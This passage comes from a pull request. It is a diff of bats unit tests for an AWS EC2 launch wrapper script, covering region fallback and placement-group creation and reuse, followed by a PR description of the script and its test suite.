+    run_sut $BASE CLONE_REPO=false
+    assert_contains "$OUTPUT" "SSH may fail"
+}
+
+# ==========================================================================
+# 10. Region resolution
+# ==========================================================================
+
+@test "region: falls back to 'aws configure get region'" {
+    run_sut INSTANCE_TYPE=m8g.large KEYPAIR=k EXPNAME=exp FAKE_REGION=eu-central-1 CLONE_REPO=false
+    assert_equal "$RC" 0
+    assert_contains "$OUTPUT" "eu-central-1"
+    assert_contains "$OPLOG" "configure get"
+}
+
+@test "region: no region anywhere fails" {
+    run_sut INSTANCE_TYPE=m8g.large KEYPAIR=k EXPNAME=exp FAKE_REGION=
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "no default region"
+}
+
+# ==========================================================================
+# 11. Placement group
+# ==========================================================================
+
+@test "placement group: none requested -> tenancy-only placement, no PG calls" {
+    run_sut $BASE CLONE_REPO=false
+    assert_contains "$(get_arg --placement)" "Tenancy=dedicated"
+    assert_not_contains "$(get_arg --placement)" "GroupName"
+    assert_not_contains "$OPLOG" "ec2 describe-placement-groups"
+}
+
+@test "placement group: existing group reused, not recreated" {
+    run_sut $BASE CLONE_REPO=false TENANCY=default \
+        PLACEMENT_GROUP_NAME=pg-exp FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=None
+    assert_equal "$RC" 0
+    assert_contains "$OPLOG" "ec2 describe-placement-groups"
+    assert_not_contains "$OPLOG" "ec2 create-placement-group"
+    assert_contains "$(get_arg --placement)" "GroupName=pg-exp"
+    assert_contains "$OUTPUT" "exists"
+}
+
+@test "placement group: missing group created with default strategy cluster" {
+    run_sut $BASE CLONE_REPO=false TENANCY=default \
+        PLACEMENT_GROUP_NAME=pg-new FAKE_PG_ID=None FAKE_PG_CREATE_ID=pg-0new
+    assert_equal "$RC" 0
+    assert_contains "$OPLOG" "ec2 create-placement-group"
+    assert_contains "$OUTPUT" "(cluster)"
+    assert_contains "$(get_arg --placement)" "GroupName=pg-new"
+    assert_contains "$OUTPUT" "Created placement group"
+}
+
+@test "placement group: existing members' subnet reused when SUBNET_ID unset" {
+    run_sut $BASE CLONE_REPO=false TENANCY=default \
+        PLACEMENT_GROUP_NAME=pg-exp FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=subnet-member9
+    assert_contains "$(get_arg --network-interfaces)" "subnet-member9"
+    assert_contains "$OUTPUT" "Reusing subnet subnet-member9"
+}
+
+@test "placement group: host tenancy warns (Dedicated Hosts not allowed in PGs)" {
+    run_sut $BASE CLONE_REPO=false TENANCY=host PLACEMENT_GROUP_NAME=pg-x FAKE_PG_ID=pg-0exist
+    assert_contains "$OUTPUT" "Dedicated Hosts"
+}
+
+@test "placement group: dedicated tenancy does NOT warn (allowed in PGs)" {
+    run_sut $BASE CLONE_REPO=false TENANCY=dedicated PLACEMENT_GROUP_NAME=pg-x FAKE_PG_ID=pg-0exist
+    assert_not_contains "$OUTPUT" "Dedicated Hosts"
+    assert_contains "$(get_arg --placement)" "GroupName=pg-x"
+}
+
+@test "placement group: resource JSON records PG name, instance id and subnet" {
+    RJSON="${BATS_TEST_TMPDIR}/pg_resources.json"
+    run_sut $BASE CLONE_REPO=false TENANCY=default RESOURCE_FILE="$RJSON" \
+        PLACEMENT_GROUP_NAME=pg-exp FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=subnet-member9
+    [ -f "$RJSON" ] || fail "resource JSON not written at $RJSON"
+    assert_contains "$(cat "$RJSON")" "pg-exp"
+    assert_contains "$(cat "$RJSON")" "i-0abc123def456"
+    assert_contains "$(cat "$RJSON")" "subnet-member9"
+}
+
+@test "placement group: SAVE_RESOURCES=false writes no JSON" {
+    RJSON="${BATS_TEST_TMPDIR}/nosave.json"
+    run_sut $BASE CLONE_REPO=false SAVE_RESOURCES=false RESOURCE_FILE="$RJSON"
+    [ ! -f "$RJSON" ] || fail "SAVE_RESOURCES=false but $RJSON exists"
+}
+
+@test "placement group: invalid strategy rejected" {
+    run_sut $BASE CLONE_REPO=false PLACEMENT_GROUP_NAME=pg-x PLACEMENT_GROUP_STRATEGY=bogus
+    assert_equal "$RC" 1
+    assert_contains "$OUTPUT" "cluster partition spread"
+}
+
+@test "placement group: partition strategy passes --partition-count on create" {
+    run_sut $BASE CLONE_REPO=false TENANCY=default \
+        PLACEMENT_GROUP_NAME=pg-part PLACEMENT_GROUP_STRATEGY=partition \
+        PLACEMENT_GROUP_PARTITION_COUNT=4 FAKE_PG_ID=None FAKE_PG_CREATE_ID=pg-0part
+    assert_equal "$RC" 0
+    assert_equal "$(get_pg_create_arg --strategy)" "partition"
+    assert_equal "$(get_pg_create_arg --partition-count)" 4
+}
+
+@test "placement group: recorded subnet reused on a follow-up run (round-trip)" {
+    RJSON="${BATS_TEST_TMPDIR}/rt.json"
+    # First launch: no live members -> the chosen subnet is recorded.
+    run_sut $BASE CLONE_REPO=false TENANCY=default RESOURCE_FILE="$RJSON" \
+        PLACEMENT_GROUP_NAME=pg-rt FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=None \
+        FAKE_SUBNET=subnet-first1
+    assert_contains "$(cat "$RJSON")" "subnet-first1"
+    # Second launch: still no live members -> must reuse the recorded subnet
+    # (read back via json_get) rather than discovering a fresh one.
+    run_sut $BASE CLONE_REPO=false TENANCY=default RESOURCE_FILE="$RJSON" \
+        PLACEMENT_GROUP_NAME=pg-rt FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=None \
+        FAKE_SUBNET=subnet-second2
+    assert_contains "$(get_arg --network-interfaces)" "subnet-first1"
+    assert_contains "$OUTPUT" "recorded for placement group"
+}
+
+@test "placement group: recorded subnet ignored when JSON region differs" {
+    RJSON="${BATS_TEST_TMPDIR}/region.json"
+    # Record in us-west-2.
+    run_sut $BASE CLONE_REPO=false TENANCY=default RESOURCE_FILE="$RJSON" \
+        PLACEMENT_GROUP_NAME=pg-rg FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=None \
+        FAKE_SUBNET=subnet-west11
+    # Re-run in a different region: the recorded subnet is region-bound and must
+    # be ignored, discovering a fresh one instead.
+    run_sut INSTANCE_TYPE=m8g.large KEYPAIR=k EXPNAME=exp AWS_REGION=eu-central-1 \
+        CLONE_REPO=false TENANCY=default RESOURCE_FILE="$RJSON" \
+        PLACEMENT_GROUP_NAME=pg-rg FAKE_PG_ID=pg-0exist FAKE_PG_MEMBER_SUBNET=None \
+        FAKE_SUBNET=subnet-east22
+    assert_contains "$OUTPUT" "ignoring its recorded subnet"
+    assert_contains "$(get_arg --network-interfaces)" "subnet-east22"
+}


### PR DESCRIPTION
## Summary

- Adds `scripts/aws_create_instance.sh`, an env-var-driven wrapper around `aws ec2 run-instances` for spinning up a throw-away SUT/LDG instance for repro/benchmark work. It is explicitly out of scope of the Repro Framework (infrastructure management remains the caller's responsibility) and is documented as such.
- Adds a full test suite under `tests/`: 74 bats unit tests (no real AWS calls, using a `fake_aws.bash` stub) and a real-AWS integration test script with automatic cleanup.
- Updates `README.md` to document the new `scripts/` and `tests/` directories and clarify the infrastructure-management scope exception.

## What `aws_create_instance.sh` does

- Accepts all configuration via environment variables (`INSTANCE_TYPE`, `KEYPAIR`, `EXPNAME`, `AMI`, `EBS_DISKS_*`, `SUBNET_ID`, `SG_ID`, `PLACEMENT_GROUP_NAME`, `TENANCY`, …). See `--help` for the full list.
- Auto-discovers AMI, subnet, and security group from the target account when not provided.
- Supports AMI aliases (`AL2023_K6.12`, `AL2023`, `UBUNTU2404`, etc.) in addition to raw `ami-*` IDs, and infers the correct SSH user and root device from the AMI metadata.
- Optionally attaches up to 25 EBS data volumes (gp3/gp2/io1/io2/st1/sc1) and configures the root volume size, type, and IOPS.
- Supports placement groups (creates them on first use), dedicated tenancy, public IP association, and instance tagging.
- Clones the repro-collection repo into the instance via cloud-init on boot (`CLONE_REPO=true` by default).
- Writes a resource JSON (`repro-results/${EXPNAME}.resources.json`) for downstream scripts to pick up instance IDs, IPs, subnet, and AZ.
- `DRYRUN=true` validates and prints the `run-instances` call without launching anything.

## Tests

| Layer | File | Coverage |
|---|---|---|
| Unit (bats) | `tests/unit/scripts/aws_create_instance.bats` | 74 tests — input validation, arch inference, AMI resolution, subnet/SG discovery, block-device mappings, tenancy/tags, user-data, DRYRUN, placement groups, full launch summary |
| Unit helper | `tests/unit/helpers/fake_aws.bash` | `aws` CLI stub, fully isolated via `env -i`, captures exact `run-instances` argv |
| Integration | `tests/integration/aws_create_instance_integration.sh` | Real-AWS end-to-end: arm64 minimal, x86 custom root, arm64 data disks, placement group; auto-terminates all created resources on exit/interrupt |

## Test plan

- [ ] `bash -n scripts/aws_create_instance.sh` passes
- [ ] Integration test dry-run: `DRYRUN=true INSTANCE_TYPE=t4g.micro KEYPAIR=<key> EXPNAME=test scripts/aws_create_instance.sh`
- [ ] Full integration: `AWS_PROFILE=default AWS_REGION=us-west-2 tests/integration/aws_create_instance_integration.sh --yes`


By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.
